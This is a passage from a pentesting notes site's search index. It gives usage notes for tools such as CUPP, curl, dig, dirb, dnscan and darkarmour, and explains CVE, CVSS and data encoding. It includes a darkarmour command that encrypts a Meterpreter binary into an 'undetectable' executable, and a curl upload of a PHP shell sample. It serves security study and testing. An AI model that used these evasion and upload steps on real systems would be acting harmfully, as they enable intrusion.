    This Common User Password Profiler tool (CUPP) generates a dictionary based on the input that you introduce when asked for names, dates, places...

    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#installation","title":"Installation","text":"

    Github repo: https://github.com/Mebus/cupp.

    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"cupp-common-user-password-profiler/#basic-commands","title":"Basic commands","text":"
    python cupp.py <flag options>\n#    -i      Interactive questions for user password profiling\n#    -w      Use this option to profile existing dictionary, or WyD.pl output to make some pwnsauce :)\n#    -l      Download huge wordlists from repository\n#    -a      Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.\n#    -v      Version of the program\n
    ","tags":["web pentesting","enumeration","tools","dictionary","dictionary generator"]},{"location":"curl/","title":"curl","text":"","tags":["bash","tools","pentesting"]},{"location":"curl/#basic-usage","title":"Basic usage","text":"
    curl -i -L $host -v\n# -L: Follow redirections\n# -i: Include headers in the response \n# -v: verbose\n\ncurl -T file.txt\n# -T, --upload-file <file>; This transfers the specified local file to the remote URL. -T uses PUT http method\n\ncurl -o target/path/filename URL\n# -o: to specify a location/filename\n\n# Upload a File\ncurl -F \"Filedata=@./shellsample.php\" URL\n\n# Sends a GET request\ncurl -X GET $ip\n\n# Sends a HEAD request\ncurl -l  $ip\n\n# Sends a OPTIONS request\ncurl -X OPTIONS  $ip\n\n# Sends a POST request with parameters name and password in the body data\ncurl -X POST  $ip -d \"name=username&password=password\" -v\n\n# Upload a file with a PUT method\ncurl $ip/uploads/ --upload-file hello.txt\n\ncurl -XDELETE $ip/uploads/hello.txt\n# Delete a file\n
    ","tags":["bash","tools","pentesting"]},{"location":"cve-common-vulnerabilities-and-exposures/","title":"cve","text":"

    Common Vulnerabilities and Exposures (CVE) is a publicly available catalog of security issues sponsored by the United States Department of Homeland Security (DHS).

    Each security issue has a unique CVE ID number assigned by the CVE Numbering Authority (CNA). The purpose of creating a unique CVE ID number is to create a standardization for a vulnerability or exposure as a researcher identifies it.

    "},{"location":"cve-common-vulnerabilities-and-exposures/#stages-of-obtaining-a-cve","title":"Stages of Obtaining a CVE","text":"

    Stage 1: Identify if CVE is Required and Relevant.

    Stage 2: Reach Out to Affected Product Vendor.

    Stage 3: Identify if Request Should Be For Vendor CNA or Third Party CNA.

    Stage 4: Requesting CVE ID Through CVE Web Form.

    Stage 5: Confirmation of CVE Form.

    Stage 6: Receival of CVE ID.

    Stage 7: Public Disclosure of CVE ID.

    Stage 8: Announcing the CVE.

    Stage 9: Providing Information to The CVE Team.

    If an issue is not responsibly disclosed to a vendor, real threat actors may be able to leverage the issues for criminal use, also referred to as a zero day or an 0-day.

    "},{"location":"cvss-common-vulnerability-scoring-system/","title":"Common Vulnerability Scoring System","text":"

    Source: Hack The Box Academy

    The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of software vulnerabilities in an objective way. For that it uses standarized vendor and platform agnostic vulnerability scoring methodologies.

    Scores ranges from 0.0 to 10.0 (being the most severe):

    • Low: 0.1-3.9.
    • Medium: 4.0-6.9
    • High: 7.0-8.9
    • Critical: 9.0-10.00

    CVSS uses a combination of base, temporal, and environmental metrics

    CVSS is not a risk rating framework (for that you have OWASP, for instance); typical out of scope impact: number of customer on a product line, monetary losses due to a breach, ....

    There are three basic vectors: Basic metric group, temporal metric group and Environmental metric group.

    The way to quote a CVSS scoring is adding also their vector.

    ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#metric-groups","title":"Metric groups","text":"

    Base score reflects the severity of a vulnerability according to ist intrinsic characteristic which are constant over time and assumes the reasonable worst case impact across different deployed environments:

    • Exploitability metrics: The Exploitability metrics are a way to evaluate the technical means needed to exploit the issue.

      • Attack vector (AV):

        • Network (N attack where there is rooter in place),
        • Adjacent (A attack is launched from the same network segment, VPN included),
        • Local (L attacker can login locally into the system),
        • Physical (P the attacker needs to be physically present).
      • Attack Complexity (AC): Conditions that should be present in order for the attack to exists.

        • Low (L): there is not specialized access conditions to perform the attack.
        • High (H): attacker should invest or prepare somehow before an attack (for instance, gathering knowledge about configurations or setup software or licenses)
      • Privileged Required (PR):

        • None (N): The attacker is unauthorize prior to attack
        • Low (L): Attacker should have user level access.
        • High (H): Privileges that provide significant control over the vulnerable component.
      • User Interaction (UI): Need user participation.

        • None (N): Attack can be perform without any action from user side.
        • Required (R): Somebody has to visit the page and click it.
    • Scope: what component is impacted by the vulnerability. Whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. If the scope is C, then IMPACT needs to be revaluated.

      • Changed (C): the exploited vulnerability affects resources managed by different security authority.
      • Unchanged (U): the exploited vulnerability can only affect resources managed by the same security authority.
    • Impact metrics: CIA. The Impact metrics represent the repercussions of successfully exploiting an issue and what is impacted in an environment, and it is based on the CIA triad.

      • Confidentiality (C): Impact to the confidentiality if the information resources are accessed.

        • None (N): None data revealed.
        • Low (L): Some data is accessed. But it has not impact.
        • High (H): Total loss of confidentiality. Access to restricted information is obtained, and disclosed information is critical.
      • Integrity (I):

        • None (N):
        • Low (L):
        • High (H):
      • Availability (A):

        • None (N):
        • Low (L):
        • High (H):

    Temporal metric group: the characteristics of a vulnerability that may change over time but not across user environments.

    • Exploit Code Maturity (E) metric represents the probability of an issue being exploited based on ease of exploitation techniques.

      • Not Defined
      • High
      • Functional
      • Proof-of-Concept
      • Unproven.
    • Remediation Level (RL) is used to identify the prioritization of a vulnerability.

      • Not Defined
      • Unavailable
      • Workaround
      • Temporary Fix
      • Official Fix
    • Report Confidence (RC) represents the validation of the vulnerability and how accurate the technical details of the issue are.

      • Not Defined
      • Confirmed
      • Reasonable
      • Unknown

    Environmet metric group: the characteristics of a vulneravbility that are relevant and unique to a particular user's environment.

    • Env (CR, IA, ...)

    All metrics are scored under the assumption that the attacker has already located and identified the vulnerability. Analyst need to consider the means by which the vulnerability was identified or difficulty to identify the vulnerability.

    ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#cvss-calculator","title":"cvss Calculator","text":"

    nist calculator

    ","tags":["cvss"]},{"location":"darkarmour/","title":"darkarmour","text":"

    Store and execute an encrypted windows binary from inside memory, without a single bit touching disk: generate an undetectable version of a pe executable.

    ","tags":["payloads","tools"]},{"location":"darkarmour/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/bats3c/darkarmour.

    It uses the python stdlib so no need to worry about any python dependencies, so the only issue you could come accoss are binary dependencies. The required binarys are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probly osslsigncode soon as well). These can all be installed via apt.

    sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode\n
    ","tags":["payloads","tools"]},{"location":"darkarmour/#basic-usage","title":"Basic usage","text":"
    ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5\n\n\n# -f: file to crypt, assumed as binary if not told otherwise\n# -e: encryption algorithm to use (xor)\n# -S: SHELLCODE file contating the shellcode, needs to be in the 'msfvenom -f raw' style format \n# -b: provide if file is a binary exe\n# -d, --dll: use reflective dll injection to execute the binary inside another process\n# -s: provide if the file is c source code\n# -k: key to encrypt with, randomly generated if not supplied\n# -l LOOP, --loop: LOOP  number of levels of encryption\n# -o: name of outfile, if not provided then random filenameis assigned\n
    ","tags":["payloads","tools"]},{"location":"data-encoding/","title":"Data encoding","text":"Resources
    • All ASCII codes
    • All UTF-8 enconding table and Unicode characters
    • Charset converter
    • HTML\u00a0URL Encoding\u00a0Reference

    Encoding ensures that data like text, images, files and multimedia can be effectively communicated and displayed through web technologies and typically involves converting data from its original form into a format that is suitable for digital transmission and storage while preserving its meaning and integrity. Encoding plays a crucial role in discovering and understanding how a web application handles different types of input, especially when those inputs contain special characters, binary data, or unexpected sequences.

    Encoding is an essential aspect of web application penetration testing, particularly when dealing with input validation, data transmission, and various attack vectors. It involves manipulating data or converting it into a different format, often to bypass security measures, discover vulnerabilities, or execute attacks.

    "},{"location":"data-encoding/#basic-concepts","title":"Basic concepts","text":"

    A \"charset,\" short for character set, is a collection of characters, symbols, and glyphs that are associated with unique numeric codes or code points. Character sets define how textual data is mapped to binary values in computing systems. Examples of charsets are: ASCII, Unicode, Latin-1 etc.

    Character encoding is the representation in bytes of the symbols of a charset.

    "},{"location":"data-encoding/#ascii-encoding","title":"ASCII encoding","text":"

    URLs are permitted to contain only the printable characters in the US-ASCII character set: those in the range 0x20-0x7e inclusive. The URL-encoded form of any character is the % prefix followed by the character's two digit ASCII code expresed in hexadecimal.

    ASCII stands for \"American Standard Code for Information Interchange.\" It's a widely used character encoding standard containing 128 characters that was developed in the 1960s to represent text and control characters in computers and communication equipment. ASCII defines a set of codes to represent letters, numbers, punctuation, and control characters used in the English language and basic communication. It primarily covers English characters, numbers, punctuation, and control characters, using 7 or 8 bits to represent each character. ASCII cannot be used to display symbols from other languages like Chinese.

    All ASCII codes

    %3d = %25 % %20 space %00 null byte %0a new line %27 ' %22 \" %2e . %2f / %28 ( %29 ) %5e ^ %3f ? %3c < %3e > %3b ; %23 # %2d - %2a * %3a : %5c| \\ %5b [ %5d ]

    Characteristics:

    • Character Set: ASCII includes a total of 128 characters, each represented by a unique 7-bit binary code. These characters include uppercase and lowercase letters, digits, punctuation marks, and some control characters.
    • 7-Bit Encoding: In ASCII, each character is encoded using 7 bits, allowing for a total of 2^7 (128) possible characters. The most significant bit is often used for parity checking in older systems.
    • Standardization: ASCII was established as a standard by the American National Standards Institute (ANSI) in 1963 and later became an international standard.
    • Basic Character Set:

      • Uppercase letters: A-Z (65-90)
      • Lowercase letters: a-z (97-122)
      • Digits: 0-9 (48-57)
      • Punctuation: Various symbols such as !, @, #, $, %, etc.
      • Control characters: Characters like newline, tab, carriage return, etc.
    • Compatibility: ASCII is a subset of many other character encodings, including more comprehensive standards like Unicode. The first 128 characters of the Unicode standard correspond to the ASCII characters.

    • Limitations: ASCII is primarily designed for English text and doesn't support characters from other languages or special symbols.
    "},{"location":"data-encoding/#unicode-encoding","title":"Unicode encoding","text":"

    Unicode is a character set standard that aims to encompass characters from all writing systems and languages used worldwide. Unlike early encoding standards like ASCII, which were limited to a small set of characters, Unicode provides a unified system for representing a vast range of characters, symbols, and glyphs in a consistent manner. It enables computers to handle text and characters from diverse languages and scripts, making it essential for internationalization and multilingual communication.

    \"UTF\" stands for \"Unicode Transformation Format.\" It refers to different character encoding schemes within the Unicode standard that are used to represent Unicode characters as binary data. Unicode has three main character encoding schemes: UTF-8, UTF-16 and UTF-32. The trailing number indicates the number of bits to represent code points.

    All UTF-8 enconding table and Unicode characters

    "},{"location":"data-encoding/#utf-8-unicode-transformation-format-8-bit","title":"UTF-8 (Unicode Transformation Format 8-bit)","text":"

    UTF-8 is a variable-length character encoding scheme. It uses 8-bit units (bytes) to represent characters. ASCII characters are represented using a single byte (backward compatibility).

    Non-ASCII characters are represented using multiple bytes, with the number of bytes varying based on the character's code point.

    UTF-8 is widely used on the web and in many applications due to its efficiency and compatibility with ASCII.

    "},{"location":"data-encoding/#utf-16-unicode-transformation-format-16-bit","title":"UTF-16 (Unicode Transformation Format 16-bit)","text":"

    UTF-16 is a variable-length character encoding scheme. It uses 16-bit units (two bytes) to represent characters. Characters with code points below 65536 (BMP - Basic Multilingual Plane) are represented using two bytes.

    Characters with higher code points (outside the BMP) are represented using four bytes (surrogate pairs).

    UTF-16 is commonly used in programming languages like Java and Windows systems.

    "},{"location":"data-encoding/#html-encoding","title":"HTML encoding","text":"

    HTML encoding, also known as HTML entity encoding, involves converting special characters and reserved symbols into their corresponding HTML entities to ensure that they are displayed correctly in web browsers and avoid any unintended interpretation as HTML code.

    HTML encoding is crucial for maintaining the integrity of web content and preventing issues such as cross-site scripting (XSS) attacks. HTML entities are sequences of characters that represent special characters, symbols, and reserved characters in HTML.

    They start with an ampersand (&) and end with a semicolon (;). When the browser encounters an entity in an HTML page it will show the symbol to the user and will not interpret the symbol as an HTML language element.

    &lt; < (less than sign) &gt; > (greater than sign) &amp; & (ampersand) &quot; \" (double quotation mark) &apos; ' (apostrophe) &nbsp; non-breaking space &mdash; em dash (\u2014) &copy; copyright symbol (\u00a9) &reg; registered trademark symbol (\u00ae) &hellip; ellipsis (...)

    In addition, any character can be HTML encoded using its ASCII code in decimal form:

    &#34; \" &#39; '

    or by using its ASCII code in hexadecimal form (prefixed by an X):

    &#x22; \" &#x27; '"},{"location":"data-encoding/#url-encoding","title":"URL Encoding","text":"

    HTML\u00a0URL Encoding\u00a0Reference

    URL encoding, also known as percent-encoding, is a process used to encode special characters, reserved characters, and non-ASCII characters into a format that is safe for transmission within URLs (Uniform Resource Locators) and URI (Uniform Resource Identifiers).

    URL encoding replaces unsafe characters with a \"%\" sign followed by two hexadecimal digits that represent the ASCII code of the character. This allows URLs to be properly interpreted by web browsers and other network components. URLs sent over the Internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are present in a URL, encoding them is required.

    This encoding is important because it limits the characters to be used in a URL to a subset of specific characters:

    • Unreserved Chars- [a-zA-z] [0-9] [- . _ ~]
    • Reserved Chars - : / ? # [ ] @ ! $ & \" ( ) * + , ; = %

    Other characters are encoded by the use of a percent char (%) plus two hexadecimal digits. Although it appears to be a security feature, URL-encoding is not. It is only a method used to send data across the Internet but, it can lower (or enlarge) the attack surface (in some cases).

    Generally, web browsers (and other client-side components) automatically perform URL-encoding and, if a server-side script engine is present, it will automatically perform URL-decoding.

    %23 # %3F ? %24 & %25 % %2F / %2B + <space> %20 or +

    URL encoding is defined in the meta tag content type:

    # before HTML5\n<meta http-equiv=\"Content-Type\"Content=\"text/html\";charset=\"utf-8\">\n\n# With HTML5\n<meta charset=\"utf-8\">\n

    This is how you define that HTML meta tag in some languages:

    # PHP\nheader('Content-type: text/html; charset=utf8');\n\n# ASP.NET\n<%Response.charset=\"utf-8\"%>\n\n# JSP\n<%@ page contentType=\"text/html; charset=UTF-8\" %>\n
    "},{"location":"data-encoding/#base64-encoding","title":"Base64 encoding","text":"

    Base64 is an schema that allows any binary data (images, audio files, and other non-text data) to be safely represented by using solely printable ASCII characters.

    Base64 is commonly used for encoding email attachtment for safe transmission over SMTP. It's also used for encoding user credentials in basic HTTP authentication.

    "},{"location":"data-encoding/#how-it-works","title":"How it works","text":"

    Encoding

    Base64 encoding processes input data in blocks of 3 bytes. It divides these 24 bits into 4 chunks of six bits each. With these 64 different possible permutations (for the six bits) it can represent the following character set:

    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\n

    Different variations of Base64 encoding may use different characters for the last two positions (+ and /).

    If the final block of input data results in less than 3 chunks of output data, the the output is padded with one or two equal signs characters.

    Decoding

    Base64 decoding is the reverse process. The encoded Base64 string is divided into segments of four characters. Each character is converted back to its 6-bit value, and these values are combined to reconstruct the original binary data.

    Use cases

    • Binary Data in Text Contexts: Web applications often deal with binary data such as images, audio, or files. Since URLs, HTML, and other text-based formats can't directly handle binary data, Base64 encoding is used to represent this binary data as text. This allows binary data to be included in places that expect text, such as in HTML or JSON responses.
    • Data URL Embedding: Data URLs are a way to embed small resources directly into the HTML or CSS code. These URLs include the actual resource data in Base64-encoded form, eliminating the need for separate HTTP requests. For example, an image can be embedded directly in the HTML using a Data URL.
    • Minimization of Requests: By encoding small images or icons as Data URLs within CSS or HTML, web developers can reduce the number of requests made to the server, potentially improving page load times.
    • Simplification of Resource Management: Embedding resources directly into HTML or CSS can simplify resource management and deployment. Developers don't need to worry about file paths or URLs.
    • Offline Storage: In certain offline or single-page applications, Base64-encoded data can be stored in local storage or indexedDB for quick access without the need to fetch resources from the server.

    Encoding/decoding in Base64:

    # PHP Example\nbase64_encode('encode this string');\nbase64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Javascript example\nwindow.btoa('encode this string');\nwindow.atob('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Handling Unicode in javascript requires previous encoding. The escapes and encodings are required to avoid exceptions with characters out of range\nwindow.btoa(encodeURIComponent(escape ('encode this string') ));\nwindow.atob(decodeURIComponent(escape ('ZW5jb2RlIHRoaXMgc3RyaW5n') ));\n
    "},{"location":"data-encoding/#base-36-encoding-scheme","title":"Base 36 encoding scheme","text":"

    It's the most compact, case-insensitive, alphanumeric numeral system using ASCII characters. The scheme's alphabet contains all digits [0-9] and Latin letters [A-Z].

    Base 10 Base 36 1294870408610 GIUSEPPE

    Base 36 Encoding scheme is used in many real-world scenarios.

    Converting Base36 to decimal:

    # Number Base36 OHPE to decimal base\n\n# PHP Example: base_convert()\nbase_convert(\"OHPE\",36,10);\n\n# Javascript example: toString\n(1142690).toString(36)\nparseInt(\"ohpe\",36)\n
    "},{"location":"data-encoding/#visual-spoofing-attack","title":"Visual spoofing attack","text":"

    It's one of the possible attacks that can be perform with unicode:

    A tool for generating visual spoofing attacks: https://www.irongeek.com/homoglyph-attack-generator.php

    Paper

    "},{"location":"data-encoding/#multiple-encodingsdecodings","title":"Multiple encodings/decodings","text":"

    Sometimes encoding and decoding is used multiple times. This can also be used to bypass security measures.

    "},{"location":"dictionaries/","title":"Dictionaries","text":"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#lists-of-my-most-used-dictionaries","title":"Lists of my most used dictionaries","text":"Dictionary Link Description Intended for Dotdotpwn https://github.com/wireghoul/dotdotpwn It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Traversal directory Payload all the things https://github.com/swisskyrepo/PayloadsAllTheThings many different resources and cheat sheets for payload generation and general methodology. Rockyou /usr/shared/wordlists/rockyou.txt.gz RockYou was a company that developed widgets for MySpace and implemented applications for various social networks and Facebook. Since 2014, it has engaged primarily in the purchases of rights to classic video games; it incorporates in-game ads and re-distributes the games. User agents Seclist Intended to bypass rate limiting (in an API) User-agent headers Windows Files My dictionaty repo To read interesting files from windows machines Intended for information disclosure Default Credential Cheat sheets https://github.com/ihebski/DefaultCreds-cheat-sheet Install and run \"python3.11 creds search <service>\"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-wordlists-in-your-kali","title":"Installing wordlists in your kali","text":"
    # This package contains the rockyou.txt wordlist and has an installation size of 134 MB.\nsudo apt install wordlists\n

    You will be adding:

    /usr/share/wordlists\n|-- amass -> /usr/share/amass/wordlists\n|-- brutespray -> /usr/share/brutespray/wordlist\n|-- dirb -> /usr/share/dirb/wordlists\n|-- dirbuster -> /usr/share/dirbuster/wordlists\n|-- dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt\n|-- fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt\n|-- fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists\n|-- john.lst -> /usr/share/john/password.lst\n|-- legion -> /usr/share/legion/wordlists\n|-- metasploit -> /usr/share/metasploit-framework/data/wordlists\n|-- nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst\n|-- rockyou.txt.gz\n|-- seclists -> /usr/share/seclists\n|-- sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt\n|-- wfuzz -> /usr/share/wfuzz/wordlist\n`-- wifite.txt -> /usr/share/dict/wordlist-probable.txt\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-seclist","title":"Installing seclist","text":"
    git clone https://github.com/danielmiessler/SecLists\n\nsudo apt install seclists -y\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#dictionary-generators","title":"Dictionary generators","text":"
    • crunch.
    • cewl.
    • Common User Password Profiler: CUPP.
    • Username Anarchy.
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#more-dictionaries","title":"More dictionaries","text":"
    • Dictionaries for cracking passwords: https://wiki.skullsecurity.org/index.php/Passwords.
    • [Wordlist from wfuzz](https://github.com/xmendez/wfuzz/tree/master/wordlist.
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#default-credentials","title":"Default credentials","text":"

    Install app \"Cred\" from: https://github.com/ihebski/DefaultCreds-cheat-sheet

    pip3 install defaultcreds-cheat-sheet\n\npython3.11 creds search tomcat\n
    ","tags":["web pentesting","dictionary","tools"]},{"location":"dig/","title":"dig","text":"

    References: dig (https://linux.die.net/man/1/dig)

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#footprinting-dns-with-dig","title":"Footprinting DNS with dig","text":"
    # Querying: A Records for a Subdomain\n dig a www.example @$ip\n # here, $ip refers to ip of DNS server\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n# here, $ip refers to ip of DNS server\n\n# View all available records\ndig any example.com @$ip\n # here, $ip refers to ip of DNS server. The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n# You can also facilitate a range:\ndig -x 192.168 @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#dig-axfr","title":"dig axfr","text":"

    dig is a DNS lookup utility but combined with \"axfr\" is used to do DNS zone transfer. This procedure is abbreviated Asynchronous Full Transfer Zone (AXFR), which is the protocol used during a DNS zone transfer.

    Basically, in a DNS query a client provide a human-readable hostname and the DNS server responses with an IP address.

    Quick syntax for zone transfers:

    dig axfr actualtarget @nameserver \n\n# You can also solicitate the transfer of reverse DNS query_\n dig axfr -x 192.168  @ip\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#what-is-a-dns-zone","title":"What is a DNS zone?","text":"

    DNS servers host zones. One example of a DNS zone might be example.com and all its subdomains. However secondzone.example.com can also be a separated zone.

    A zone file is a text file that describes a DNS zone with the BIND file format. In other words it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#why-is-dns-zone-transfer-needed","title":"Why Is DNS Zone Transfer Needed","text":"

    DNS is a critical service. If a DNS server for a zone is not working and cached information has expired, the domain is inaccessible to all services (web, mail, and more). Therefore, each zone should have at least two DNS servers. For more critical zones, there may be even more.

    However, a zone may be large and may require frequent changes. If you manually edit zone data on each server separately, it takes a lot of time and there is a a lot of potential for a mistake. This is why DNS zone transfer is needed.

    You can use different mechanisms for DNS zone transfer but the simplest one is AXFR (technically speaking, AXFR refers to the protocol used during a DNS zone transfer). It is a client-initiated request. Therefore, you can edit information on the primary DNS server and then use AXFR from the secondary DNS server to download the entire zone.

    Synchronization between the servers involved is realized by zone transfer. Using a secret key rndc-key, which we have seen initially in the default configuration, the servers make sure that they communicate with their own master or slave. A DNS server that serves as a direct source for synchronizing a zone file is called a master. A DNS server that obtains zone data from a master is called a slave. A primary is always a master, while a secondary can be both a slave and a master. For some Top-Level Domains (TLDs), making zone files for the Second Level Domains accessible on at least two servers is mandatory.

    Initiating an AXFR zone-transfer request from a secondary server is as simple as using the following dig commands, where zonetransfer.me is the domain that we want to initiate a zone transfer for. First, we will need to get the list of DNS servers for the domain.

    dig axfr example.htb @$ip\n

    If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution or set it to any, everyone would query the entire zone file at the DNS server.

    If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone file from the primary DNS server to another DNS server. A DNS Zone transfer can provide penetration testers with a holistic view of an organization's network layout. Furthermore, in certain cases, internal network addresses may be found on an organization's DNS servers.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#htb-machines","title":"HTB machines","text":"

    Some HackTheBox machines exploits DNS zone transfer:

    In the example of Friendzone machine, accessible web page on port 80 provides an email in which a different domain is appreciated. Also port 53 is open, which is an indicator of some possible DNS zone transfer.

    In friendzone, we will transfer our zone to all zones spotted in different scanners:

    # friendzone.red was spotted in the nmap scan. Transferring 10.129.228.87 zone to friendzone.red\ndig axfr friendzone.red @10.129.228.87\n\n# Also friendzoneportal.red was spotted in the email that appeared on http://10.129.228.87. Transferring 10.129.228.87 zone to friendzoneportal.red:\ndig axfr friendzoneportal.red @10.129.228.87\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dirb/","title":"dirb - A web content enumeration tool","text":"

    DIRB is a web content fingerprinting tool. It scans the server for directories using a dictionary file.

    Scan the web server (http://192.168.1.224/) for directories using a dictionary file (/usr/share/wordlists/dirb/common.txt):

    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#dictionaries","title":"Dictionaries","text":"

    See dictionaries in this repo.

    Path to default dictionary: /usr/share/dirb/wordlists/

    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#basic-commands","title":"Basic commands","text":"
    dirb <HOST>  /path/to/dictionary.txt -o results.txt\n# No flag needed to specify path to dictionary.\n# -o: to print results to a file.\n# -a: agent application. In case that the app checks out this header (use it with https://useragentstring.com/pages/useragentstring.php)\n# -p: for indicating a proxy (for instance, Burp: dirb <target host or IP> -p http://127.0.0.1:8080)\n# -c: it adds a cookie (dirb <target host or IP> -c \u201cMYCOOKIE: ashdkjashdjkas\u201d)\n# -H: it adds a customized header (dirb <target host or IP> -H \u201cMYHEADER: Mycontent\u201d)\n# -r: don\u2019t search recursively in directories\n# -z: it adds a millisecond delay to not cause excessive Flood.\n# -S: silent mode. It doesn\u2019t show tested words.\n# -X: It allows us to specify extensions (dirb <target host or IP> -X \u201c.php, .bak\u201d). Appends each word with this extension\n# -x:  It allows us to use a file with extensions (dirb <target host or IP> -x extensionfile.txt). Appends each word with the extensions specified in the file\n# -o: to save the results in an output file\n
    ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirty-cow/","title":"Dirty COW (Copy On Write)","text":"

    A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.

    An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

    This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

    ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#exploitation","title":"Exploitation","text":"

    List of PoCs: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.

    ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#resources","title":"Resources","text":"
    • https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails.
    ","tags":["pentesting","linux","privileges escalation"]},{"location":"django-pentesting/","title":"django pentesting","text":"

    The following Github repository describes OWASP Top10 for Django: https://github.com/boomcamp/django-security

    ","tags":["python","django","pentesting","web pentesting"]},{"location":"dnscan/","title":"dnscan - A DNS subdomain scanner","text":"

    dnscan is a python wordlist-based DNS subdomain scanner.

    The script will first try to perform a zone transfer using each of the target domain's nameservers.

    If this fails, it will lookup TXT and MX records for the domain, and then perform a recursive subdomain scan using the supplied wordlist.

    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#installation","title":"Installation","text":"

    Requirements: dnscan requires Python 3, and the netaddr (version 0.7.19 or greater) and dnspython (version 2.0.0 or greater) libraries.

    git clone https://github.com/rbsec/dnscan\ncd dnscan\npip install -r requirements.txt\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#usage","title":"Usage","text":"
    dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#optional-arguments","title":"Optional Arguments","text":"
    -w --wordlist <wordlist>                  Wordlist of subdomains to use\n-t --threads <threadcount>                Threads (1 - 32), default 8\n-6 --ipv6                                 Scan for IPv6 records (AAAA)\n-z --zonetransfer                         Perform zone transfer and exit\n-r --recursive                            Recursively scan subdomains\n   --recurse-wildcards                    Recursively scan wildcards (slow)\n\n-m --maxdepth                             Maximum levels to scan recursively\n-a --alterations                          Scan for alterations of subdomains (slow)\n-R --resolver <resolver>                  Use the specified resolver instead of the system default\n-L --resolver-list <file>                 Read list of resolvers from a file\n-T --tld                                  Scan for the domain in all TLDs\n-o --output <filename>                    Output to a text file\n-i --output-ips <filename>                Output discovered IP addresses to a text file\n-n --nocheck                              Don't check nameservers before scanning. Useful in airgapped networks\n-q --quick                                Only perform the zone transfer and subdomain scans. Suppresses most file output with -o\n-N --no-ip                                Don't print IP addresses in the output\n-v --verbose                              Verbose output\n-h --help                                 Display help text\n

    Custom insertion points can be specified by adding %% in the domain name, such as:

    dnscan.py -d dev-%%.example.org\n
    ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnsenum/","title":"dnsenum - A tool to enumerate DNS","text":"

    multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#installation","title":"Installation","text":"

    Download from the github repo: https://github.com/fwaeytens/dnsenum.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#basic-usage","title":"Basic usage","text":"

    Used for active fingerprinting:

    dnsenum domain.com\n

